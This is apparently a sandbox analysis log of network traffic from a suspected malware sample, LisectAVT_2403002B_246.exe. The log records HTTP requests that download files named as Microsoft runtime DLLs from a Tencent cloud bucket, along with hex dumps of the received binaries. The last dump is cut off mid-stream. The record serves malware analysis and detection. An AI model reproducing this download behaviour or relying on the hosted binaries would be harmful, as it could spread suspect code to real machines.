2024-07-25 14:04:30 UTC	16384	IN	Data Raw: 6a 6f ff ff 50 c6 45 fc 02 e8 85 ce ff ff 59 8d 4d e0 8b d8 e8 3c 5a ff ff 8b 0e 8d 55 e4 8b 03 52 8d 55 ec c6 45 d4 01 8b 49 04 52 03 ce c6 45 fc 03 51 ff 75 d4 83 79 38 00 57 0f 94 45 cc ff 75 cc ff 71 38 8d 4d c8 51 8b cb ff 50 28 eb 30 8b 4d e8 33 ff 8b 01 8b 50 04 03 d1 8b 42 0c 83 c8 04 39 7a 38 75 03 83 c8 04 83 e0 17 89 42 0c 85 42 10 75 37 b8 57 8a 01 10 c3 8b 75 e8 33 ff 8b 4d ec c7 45 fc 01 00 00 00 f6 c1 02 75 15 8b 55 e4 8d 82 00 00 00 80 83 f8 ff 77 07 8b 45 08 89 10 eb 12 83 c9 02 89 4d ec eb 0a 57 57 e8 ab 28 02 00 8b 4d ec 8b 06 57 51 8b 48 04 03 ce e8 58 78 ff ff 8b 06 83 4d fc ff 8b 40 04 8b 4c 30 38 85 c9 74 05 8b 01 ff 50 08 8b c6 e8 83 28 02 00 c2 04 00 6a 28 b8 a1 d6 03 10 e8 0f 29 02 00 8b f1 89 75 ec 33 ff 89 75 dc 89 7d e8 8b 06 Data Ascii: joPEYM<ZURUEIREQuy8WEuq8MQP(0M3PB9z8uBBu7Wu3MEuUwEMWW(MWQHXxM@L08tP(j()u3u}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	43.153.232.151	443	7328	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 14:04:32 UTC	135	OUT	GET /msvcr120.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 14:04:33 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 970912 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 14:04:33 GMT ETag: "034ccadc1c073e4216e9466b720f9849" Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 3551019292791871068 x-cos-request-id: NjZhMjViNzBfOGRiMjQ4MGJfMTc5Ml82NTdmM2Q= x-cos-server-side-encryption: AES256
2024-07-25 14:04:33 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 53 39 02 12 17 58 6c 41 17 58 6c 41 17 58 6c 41 ca a7 a7 41 14 58 6c 41 17 58 6d 41 a7 58 6c 41 51 09 8c 41 b9 5a 6c 41 51 09 b3 41 76 58 6c 41 51 09 89 41 21 58 6c 41 51 09 8d 41 af 58 6c 41 51 09 b0 41 16 58 6c 41 51 09 b7 41 16 58 6c 41 51 09 b2 41 16 58 6c 41 52 69 63 68 17 58 6c 41 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 7c 4f 52 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$S9XlAXlAXlAAXlAXmAXlAQAZlAQAvXlAQA!XlAQAXlAQAXlAQAXlAQAXlARichXlAPEL\|OR"
2024-07-25 14:04:34 UTC	16384	IN	Data Raw: af 53 03 00 65 57 03 00 27 1f 0c 00 1f 76 0a 00 c4 b7 0a 00 46 e3 07 00 65 e3 07 00 d7 b3 07 00 84 3d 0a 00 49 15 03 00 12 03 0a 00 0f 2f 08 00 b1 2f 08 00 05 c1 02 00 27 e2 07 00 85 57 03 00 d2 7b 01 00 9c 33 08 00 5c ce 02 00 bf 3d 0a 00 63 89 08 00 46 e2 07 00 e4 34 08 00 ad 35 08 00 69 36 08 00 90 35 08 00 e5 38 08 00 04 39 08 00 86 36 08 00 a7 36 08 00 c9 36 08 00 ea 36 08 00 2b 44 03 00 7a 37 08 00 bd 25 03 00 7a 3a 08 00 97 37 08 00 b8 37 08 00 da 37 08 00 fb 37 08 00 e4 1a 0a 00 4a 1c 0a 00 6c 02 08 00 b0 02 08 00 00 03 08 00 42 03 08 00 92 03 08 00 d9 03 08 00 38 06 08 00 50 06 08 00 81 76 0a 00 d4 78 0a 00 24 39 08 00 3e 39 08 00 5a 39 08 00 77 39 08 00 94 39 08 00 b3 39 08 00 d1 e4 07 00 a3 e5 07 00 17 e5 07 00 5d e5 07 00 37 b8 0a 00 d1 b8 0a Data Ascii: SeW'vFe=I//'W{3\=cF45i65896666+Dz7%z:7777JlB8Pvx$9>9Z9w999]7
2024-07-25 14:04:34 UTC	8168	IN	Data Raw: 6c 6c 65 63 74 69 6f 6e 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 51 41 45 40 58 5a 00 3f 3f 30 5f 54 69 6d 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 40 49 5f 4e 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 41 41 45 40 50 42 51 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 74 61 72 67 65 74 40 43 6f Data Ascii: llection@details@Concurrency@@QAE@XZ??0_Timer@details@Concurrency@@IAE@I_N@Z??0__non_rtti_object@std@@QAE@ABV01@@Z??0__non_rtti_object@std@@QAE@PBD@Z??0bad_cast@std@@AAE@PBQBD@Z??0bad_cast@std@@QAE@ABV01@@Z??0bad_cast@std@@QAE@PBD@Z??0bad_target@Co
2024-07-25 14:04:34 UTC	8184	IN	Data Raw: 53 70 69 6e 57 61 69 74 40 24 30 41 40 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 58 58 5a 00 3f 5f 47 65 74 40 5f 43 75 72 72 65 6e 74 53 63 68 65 64 75 6c 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 53 41 3f 41 56 5f 53 63 68 65 64 75 6c 65 72 40 32 33 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 52 54 54 72 61 63 65 49 6e 66 6f 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 50 42 55 5f 43 4f 4e 43 52 54 5f 54 52 41 43 45 5f 49 4e 46 4f 40 64 65 74 61 69 6c 73 40 31 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 75 72 72 65 6e 63 79 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 49 58 5a 00 3f 5f 47 65 74 43 75 72 72 65 6e 74 49 6e 6c 69 6e 65 44 65 70 74 68 40 5f 53 74 61 63 6b 47 Data Ascii: SpinWait@$0A@@details@Concurrency@@IAEXXZ?_Get@_CurrentScheduler@details@Concurrency@@SA?AV_Scheduler@23@XZ?_GetConcRTTraceInfo@Concurrency@@YAPBU_CONCRT_TRACE_INFO@details@1@XZ?_GetConcurrency@details@Concurrency@@YAIXZ?_GetCurrentInlineDepth@_StackG
2024-07-25 14:04:34 UTC	8184	IN	Data Raw: 74 5f 74 6c 73 69 6e 64 65 78 00 5f 5f 67 65 74 6d 61 69 6e 61 72 67 73 00 5f 5f 69 6e 69 74 65 6e 76 00 5f 5f 69 6f 62 5f 66 75 6e 63 00 5f 5f 69 73 61 73 63 69 69 00 5f 5f 69 73 63 73 79 6d 00 5f 5f 69 73 63 73 79 6d 66 00 5f 5f 69 73 77 63 73 79 6d 00 5f 5f 69 73 77 63 73 79 6d 66 00 5f 5f 6c 63 6f 6e 76 00 5f 5f 6c 63 6f 6e 76 5f 69 6e 69 74 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 63 6f 73 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 63 6f 73 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 73 69 6e 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 73 69 6e 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 32 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 63 6f 73 Data Ascii: t_tlsindex__getmainargs__initenv__iob_func__isascii__iscsym__iscsymf__iswcsym__iswcsymf__lconv__lconv_init__libm_sse2_acos__libm_sse2_acosf__libm_sse2_asin__libm_sse2_asinf__libm_sse2_atan__libm_sse2_atan2__libm_sse2_atanf__libm_sse2_cos
2024-07-25 14:04:34 UTC	8184	IN	Data Raw: 6f 63 5f 63 72 74 5f 6d 61 78 5f 77 61 69 74 00 5f 73 65 74 5f 6f 75 74 70 75 74 5f 66 6f 72 6d 61 74 00 5f 73 65 74 5f 70 72 69 6e 74 66 5f 63 6f 75 6e 74 5f 6f 75 74 70 75 74 00 5f 73 65 74 5f 70 75 72 65 63 61 6c 6c 5f 68 61 6e 64 6c 65 72 00 5f 73 65 74 65 72 72 6f 72 6d 6f 64 65 00 5f 73 65 74 6a 6d 70 00 5f 73 65 74 6a 6d 70 33 00 5f 73 65 74 6d 61 78 73 74 64 69 6f 00 5f 73 65 74 6d 62 63 70 00 5f 73 65 74 6d 6f 64 65 00 5f 73 65 74 73 79 73 74 69 6d 65 00 5f 73 6c 65 65 70 00 5f 73 6e 70 72 69 6e 74 66 00 5f 73 6e 70 72 69 6e 74 66 5f 63 00 5f 73 6e 70 72 69 6e 74 66 5f 63 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 73 00 5f 73 6e 70 72 69 6e 74 66 5f 73 5f 6c 00 5f 73 6e 73 63 61 6e 66 00 5f 73 6e 73 63 61 6e 66 5f Data Ascii: oc_crt_max_wait_set_output_format_set_printf_count_output_set_purecall_handler_seterrormode_setjmp_setjmp3_setmaxstdio_setmbcp_setmode_setsystime_sleep_snprintf_snprintf_c_snprintf_c_l_snprintf_l_snprintf_s_snprintf_s_l_snscanf_snscanf_
2024-07-25 14:04:34 UTC	8184	IN	Data Raw: 46 69 6c 65 20 74 6f 6f 20 6c 61 72 67 65 00 90 4e 6f 20 73 70 61 63 65 20 6c 65 66 74 20 6f 6e 20 64 65 76 69 63 65 00 49 6e 76 61 6c 69 64 20 73 65 65 6b 00 90 90 90 52 65 61 64 2d 6f 6e 6c 79 20 66 69 6c 65 20 73 79 73 74 65 6d 00 90 90 54 6f 6f 20 6d 61 6e 79 20 6c 69 6e 6b 73 00 90 42 72 6f 6b 65 6e 20 70 69 70 65 00 44 6f 6d 61 69 6e 20 65 72 72 6f 72 00 90 90 90 52 65 73 75 6c 74 20 74 6f 6f 20 6c 61 72 67 65 00 90 90 90 52 65 73 6f 75 72 63 65 20 64 65 61 64 6c 6f 63 6b 20 61 76 6f 69 64 65 64 00 90 90 46 69 6c 65 6e 61 6d 65 20 74 6f 6f 20 6c 6f 6e 67 00 90 90 4e 6f 20 6c 6f 63 6b 73 20 61 76 61 69 6c 61 62 6c 65 00 90 46 75 6e 63 74 69 6f 6e 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 00 90 90 90 44 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 65 Data Ascii: File too largeNo space left on deviceInvalid seekRead-only file systemToo many linksBroken pipeDomain errorResult too largeResource deadlock avoidedFilename too longNo locks availableFunction not implementedDirectory not e
2024-07-25 14:04:34 UTC	8184	IN	Data Raw: 4e 00 4f 00 00 00 90 90 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 90 90 73 00 6d 00 61 00 2d 00 53 00 45 00 00 00 90 90 61 00 72 00 2d 00 4f 00 4d 00 00 00 65 00 6e 00 2d 00 4a 00 4d 00 00 00 65 00 73 00 2d 00 56 00 45 00 00 00 73 00 6d 00 73 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 59 00 45 00 00 00 65 00 6e 00 2d 00 43 00 42 00 00 00 65 00 73 00 2d 00 43 00 4f 00 00 00 73 00 6d 00 6e 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 53 00 59 00 00 00 65 00 6e 00 2d 00 42 00 5a 00 00 00 65 00 73 00 2d 00 50 00 45 00 00 00 61 00 72 00 2d 00 4a 00 4f 00 00 00 65 00 6e 00 2d 00 54 00 54 00 00 00 65 00 73 00 2d 00 41 Data Ascii: NOar-TNen-ZAes-DOsr-BA-Cyrlsma-SEar-OMen-JMes-VEsms-FIar-YEen-CBes-COsmn-FIar-SYen-BZes-PEar-JOen-TTes-A
2024-07-25 14:04:34 UTC	8184	IN	Data Raw: 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 55 8b ec 8b 55 14 8b 4d 08 56 85 d2 0f 84 5f e5 00 00 85 c9 0f 84 64 e5 00 00 8b 45 0c 85 c0 0f 84 59 e5 00 00 85 d2 0f 84 5b e5 00 00 8b 75 10 85 f6 0f 84 a2 38 04 00 53 8b d9 57 8b f8 83 fa ff 75 1e 2b de 8a 06 88 04 33 46 84 c0 74 03 4f 75 f3 85 ff 5f 5b 0f 84 d5 bf 01 00 33 c0 5e 5d c3 2b f1 8a 04 1e 88 03 43 84 c0 74 06 4f 74 03 4a 75 f0 85 d2 75 db 88 13 eb d7 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 55 8b ec 83 ec 18 8b 45 08 8b 55 0c 53 8b 5d 14 56 57 c6 45 ff 00 8b 7b 08 8d 73 10 33 38 c7 45 f4 01 00 00 00 8b 07 83 f8 fe 0f 85 a5 d1 04 00 8b 47 08 8b 4f 0c 03 ce 33 0c 30 ff d2 8b 45 10 f6 40 04 66 0f 85 24 d5 00 Data Ascii: L$+AL$+AL$+AL$+UUMV_dEY[u8SWu+3FtOu_[3^]+CtOtJuuUVWS33333[_^]UEUS]VWE{s38EGO30E@f$
2024-07-25 14:04:34 UTC	8184	IN	Data Raw: 8b ec 57 8b f9 8b 47 08 d1 e8 a8 01 75 25 8b 4d 08 8b 41 08 d1 e8 a8 01 74 19 56 8b 71 08 8b 41 08 83 c6 08 83 e6 fa a8 01 0f 85 8a d7 03 00 09 77 08 5e 5f 5d c2 04 00 55 8b ec 83 ec 0c 53 56 8b 75 08 57 8b f9 8b 06 3b 07 0f 84 d7 d8 03 00 8b de 8d 47 20 87 18 8b ce 85 db 0f 85 a6 d8 03 00 57 e8 98 ff ff ff 89 77 1c 8d 57 24 43 8b 02 8b c8 0b cb f0 0f b1 0a 75 f6 a8 04 0f 85 8e d8 03 00 6a 02 5b 8b 02 8b c8 0b cb f0 0f b1 0a 75 f6 83 f8 08 0f 8d 76 d8 03 00 83 66 08 fe 80 7d 0c 00 74 13 8b 46 08 89 47 08 8b 46 04 89 47 04 8b 06 89 07 89 77 1c 5f 5e 5b 8b e5 5d c2 08 00 6a 04 b8 b4 b3 0d 10 e8 ec fe ff ff 8b f9 8b 45 08 8d 77 04 89 07 89 75 08 89 75 f0 83 65 fc 00 85 f6 74 09 6a ff 8b ce e8 c7 fd ff ff 83 4d fc ff 8b 0f 6a 01 56 e8 3d ff ff ff 8b c7 e8 e9 Data Ascii: WGu%MAtVqAw^_]USVuW;G WwW$Cuj[uvf}tFGFGw_^[]jEwuuetjMjV=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	43.153.232.151	443	7328	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 14:04:36 UTC	139	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 14:04:36 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 91104 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 14:04:36 GMT ETag: "9c133b18fa9ed96e1aeb2da66e4a4f2b" Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 15584681233261869999 x-cos-request-id: NjZhMjViNzRfZDBhYzQ4MGJfM2NiNzZfNjg0MTkw x-cos-server-side-encryption: AES256
2024-07-25 14:04:36 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 8f b4 8a e1 ee da d9 e1 ee da d9 e1 ee da d9 32 9c db d8 e3 ee da d9 e8 96 49 d9 ea ee da d9 e1 ee db d9 c8 ee da d9 e7 6f d9 d8 f2 ee da d9 e7 6f de d8 f7 ee da d9 e7 6f df d8 fd ee da d9 e7 6f da d8 e0 ee da d9 e7 6f 25 d9 e0 ee da d9 e7 6f d8 d8 e0 ee da d9 52 69 63 68 e1 ee da d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 73 87 13 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$2Iooooo%oRichPELs"
2024-07-25 14:04:36 UTC	8184	IN	Data Raw: c8 28 00 00 1c 00 00 00 2e 72 64 61 74 61 24 73 78 64 61 74 61 00 00 00 e4 28 00 00 b0 00 00 00 2e 72 64 61 74 61 24 76 6f 6c 74 6d 64 00 00 00 94 29 00 00 3c 02 00 00 2e 72 64 61 74 61 24 7a 7a 7a 64 62 67 00 00 00 d0 2b 00 00 13 ce 00 00 2e 74 65 78 74 24 6d 6e 00 00 00 00 e3 f9 00 00 4d 00 00 00 2e 74 65 78 74 24 78 00 30 fa 00 00 10 03 00 00 2e 78 64 61 74 61 24 78 00 00 00 00 40 fd 00 00 14 09 00 00 2e 65 64 61 74 61 00 00 00 10 01 00 94 00 00 00 2e 64 61 74 61 00 00 00 94 10 01 00 b8 00 00 00 2e 64 61 74 61 24 72 00 4c 11 01 00 b4 00 00 00 2e 64 61 74 61 24 72 73 00 00 00 00 00 12 01 00 64 04 00 00 2e 62 73 73 00 00 00 00 00 20 01 00 bc 00 00 00 2e 69 64 61 74 61 24 35 00 00 00 00 bc 20 01 00 08 00 00 00 2e 30 30 63 66 67 00 00 c4 20 01 00 78 00 00 Data Ascii: (.rdata$sxdata(.rdata$voltmd)<.rdata$zzzdbg+.text$mnM.text$x0.xdata$x@.edata.data.data$rL.data$rsd.bss .idata$5 .00cfg x
2024-07-25 14:04:36 UTC	8184	IN	Data Raw: 00 00 00 0f b6 c8 0f b6 42 14 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 9b 05 00 00 0f b6 4e 15 0f b6 42 15 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 79 05 00 00 0f b6 4e 16 0f b6 42 16 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 57 05 00 00 0f b6 4e 17 0f b6 42 17 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 35 05 00 00 8b 46 18 3b 42 18 0f 84 87 00 00 00 0f b6 c8 0f b6 42 18 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 08 05 00 00 0f b6 4e 19 0f b6 42 19 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e6 04 00 00 0f b6 4e 1a 0f b6 42 1a 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 c4 04 00 00 0f b6 4e 1b Data Ascii: B+t3ENB+t3EyNB+t3EWNB+t3E5F;BB+t3ENB+t3ENB+t3EN
2024-07-25 14:04:36 UTC	8184	IN	Data Raw: a4 85 00 00 57 ff 75 14 ff 75 0c e8 12 06 00 00 57 e8 c2 07 00 00 83 c4 10 50 e8 79 05 00 00 cc 55 8b ec 83 ec 38 53 8b 5d 08 81 3b 03 00 00 80 0f 84 17 01 00 00 56 57 e8 17 16 00 00 33 ff 39 78 08 74 46 57 ff 15 48 20 01 10 8b f0 e8 02 16 00 00 39 70 08 74 33 81 3b 4d 4f 43 e0 74 2b 81 3b 52 43 43 e0 74 23 ff 75 24 ff 75 20 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 53 e8 19 84 00 00 83 c4 1c 85 c0 0f 85 c1 00 00 00 8b 45 18 89 45 ec 89 7d f0 39 78 0c 0f 86 b4 00 00 00 ff 75 20 50 ff 75 14 8d 45 ec ff 75 1c 50 8d 45 dc 50 e8 18 83 00 00 8b 55 e0 83 c4 18 8b 45 dc 89 45 f4 89 55 fc 3b 55 e8 0f 83 80 00 00 00 6b ca 14 89 4d f8 8b 00 8d 7d c8 6a 05 8b 70 10 8b 45 1c 03 f1 59 f3 a5 39 45 c8 7f 4e 3b 45 cc 7f 49 8b 4d d4 8b 45 d8 c1 e1 04 83 c0 f0 03 c1 8b 48 04 85 Data Ascii: WuuWPyU8S];VW39xtFWH 9pt3;MOCt+;RCCt#u$u uuuuSEE}9xu PuEuPEPUEEU;UkM}jpEY9EN;EIMEH
2024-07-25 14:04:36 UTC	8184	IN	Data Raw: 03 eb 03 83 26 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 55 0c 83 fa 09 77 20 83 39 ff 74 17 3b 11 7f 13 8b 54 91 04 8b 45 08 8b 0a 89 08 8b 4a 04 89 48 04 eb 11 6a 02 eb 02 6a 03 8b 4d 08 e8 70 fd ff ff 8b 45 08 5d c2 08 00 55 8b ec 51 51 ff 75 0c 8d 4d f8 e8 e9 fc ff ff ff 75 10 8b c8 ff 75 08 e8 74 00 00 00 8b 45 08 c9 c3 55 8b ec 51 51 ff 75 0c 83 65 f8 00 8d 4d f8 83 65 fc 00 e8 42 10 00 00 ff 75 10 8d 4d f8 ff 75 08 e8 49 00 00 00 8b 45 08 c9 c3 55 8b ec 51 51 ff 75 0c 8d 4d f8 e8 0c fd ff ff ff 75 10 8b c8 ff 75 08 e8 27 00 00 00 8b 45 08 c9 c3 55 8b ec 8b 11 56 8b 75 08 ff 75 0c 89 16 8b 49 04 89 4e 04 8b ce e8 6d 00 00 00 8b c6 5e 5d c2 08 00 55 8b ec 8b 11 56 8b 75 08 ff 75 0c 89 16 8b 49 04 89 4e 04 8b ce e8 a3 00 00 00 8b c6 5e 5d c2 08 00 55 8b ec Data Ascii: &^]UUw 9t;TEJHjjMpE]UQQuMuutEUQQueMeBuMuIEUQQuMuu'EUVuuINm^]UVuuIN^]U
2024-07-25 14:04:36 UTC	16384	IN	Data Raw: ff ff eb 30 6a 08 b9 1c 13 01 10 e8 1f 14 00 00 8b f0 85 f6 74 13 8b ce e8 cb de ff ff c7 06 44 22 00 10 c6 46 04 20 eb 02 33 f6 56 8d 4d dc e8 bd da ff ff 8d 45 c8 50 8d 45 d0 50 8d 4d dc e8 9e e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 4d b8 85 c9 74 2e 8b 45 bc 89 4d c0 8d 4d c0 6a 20 89 45 c4 e8 8e e1 ff ff 8d 45 f4 50 8d 45 d0 50 8d 4d c0 e8 69 e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 45 d8 a8 10 0f 84 f5 00 00 00 83 7d 18 00 0f 85 69 03 00 00 85 ff 0f 8e 89 00 00 00 8d 45 e8 c7 45 e8 fc 1d 00 10 50 8d 4d d0 c7 45 ec 02 00 00 00 e8 8f dc ff ff 8d 4d f4 51 8d 4d e8 51 8b c8 e8 18 e0 ff ff 8b 45 e8 89 45 f4 8b 45 ec 89 45 f8 a1 00 13 01 10 80 38 00 74 23 8d 45 d0 50 e8 08 24 00 00 59 8d 4d f4 51 8d 4d a8 51 8b c8 e8 e9 df ff ff 8b 08 8b 58 04 89 Data Ascii: 0jtD"F 3VMEPEPMXM]Mt.EMMj EEPEPMiXM]E}iEEPMEMQMQEEEE8t#EP$YMQMQX
2024-07-25 14:04:36 UTC	8168	IN	Data Raw: 41 a3 00 13 01 10 3b 4d 08 72 ef b0 01 5d c3 32 c0 5d c3 33 c0 39 01 0f 94 c0 c3 33 c0 80 79 04 01 0f 9e c0 c3 57 8b 39 85 ff 75 04 33 c0 5f c3 8b 07 56 8b 30 8b ce ff 15 bc 20 01 10 8b cf ff d6 5e 5f c3 cc cc cc cc cc cc cc cc 8b 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc 33 c0 40 c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 49 04 85 c9 0f 85 ae ff ff ff 33 c0 c3 cc cc 55 8b ec 51 8b 41 0c 89 4d fc 85 c0 79 39 53 56 57 8b 79 08 8b 07 8b 30 8b ce ff 15 bc 20 01 10 8b cf ff d6 8b d8 8b 45 fc 8b 78 04 8b 07 8b 30 8b ce ff 15 bc 20 01 10 8b cf ff d6 8b 4d fc 03 c3 5f 5e 5b 89 41 0c c9 c3 55 8b ec 8b 45 08 83 f8 03 77 0a 6b c0 0c 05 b0 23 00 10 5d c3 b8 d4 23 00 10 5d c3 55 8b ec a1 04 13 01 10 83 ec 18 33 d2 57 8b 7d 08 89 17 89 57 04 85 c0 0f 84 d8 00 00 00 Data Ascii: A;Mr]2]393yW9u3_V0 ^_A3@I3UQAMy9SVWy0 Ex0 M_^[AUEwk#]#]U3W}W
2024-07-25 14:04:36 UTC	8184	IN	Data Raw: 6f 40 40 00 ca 23 01 00 9a 25 01 00 86 25 01 00 68 25 01 00 4c 25 01 00 32 25 01 00 1c 25 01 00 06 25 01 00 ec 24 01 00 d0 24 01 00 bc 24 01 00 a6 24 01 00 94 24 01 00 82 24 01 00 74 24 01 00 6a 24 01 00 40 23 01 00 4c 23 01 00 5c 23 01 00 6c 23 01 00 88 23 01 00 a0 23 01 00 b2 23 01 00 4e 24 01 00 e2 23 01 00 fa 23 01 00 0a 24 01 00 1a 24 01 00 42 24 01 00 5c 24 01 00 00 00 00 00 88 22 01 00 00 00 00 00 3e 22 01 00 28 22 01 00 20 22 01 00 00 00 00 00 14 22 01 00 0c 22 01 00 00 00 00 00 52 22 01 00 6c 22 01 00 00 00 00 00 32 22 01 00 90 22 01 00 48 22 01 00 00 00 00 00 a0 3f 00 10 00 00 00 00 e4 21 01 00 00 00 00 00 00 00 00 00 9a 22 01 00 94 20 01 00 d4 21 01 00 00 00 00 00 00 00 00 00 bc 22 01 00 84 20 01 00 fc 21 01 00 00 00 00 00 00 00 00 00 dc 22 01 Data Ascii: o@@#%%h%L%2%%%$$$$$$t$j$@#L#\#l####N$##$$B$\$">"(" """R"l"2""H"?!" !" !"
2024-07-25 14:04:36 UTC	8184	IN	Data Raw: e0 17 6d 36 9c 91 55 dc 4b 4f 0c 63 4d ce 51 2e a0 55 53 26 4a ce 7f 0f 44 d8 1c d2 d0 1f 0f 06 3a 12 f3 53 98 99 fd 39 34 2c 23 f5 14 90 85 ce 32 51 4e 44 8d 5e 85 d2 33 7f 22 af 3c 54 7b 71 07 d0 5f ba 77 1c 4f 03 25 49 50 3a 41 db 59 a1 0f 04 24 1f 5e 06 a7 9b e9 ab b8 25 52 f3 83 af 5b 26 3d d9 37 18 cb a5 b7 e4 48 d0 c2 be ed 5f bf 36 4e e9 7b 36 55 7c 19 e1 32 22 11 ae 6c cb 0b b7 a9 71 47 5e 54 80 c8 ab 7e 05 ba 63 82 3c 52 97 40 1d 9c ea 77 02 03 01 00 01 a3 82 01 4b 30 82 01 47 30 10 06 09 2b 06 01 04 01 82 37 15 01 04 03 02 01 00 30 1d 06 03 55 1d 0e 04 16 04 14 77 92 04 78 27 b2 0b 49 07 75 97 ee e9 eb 5e 26 5c 09 44 75 30 19 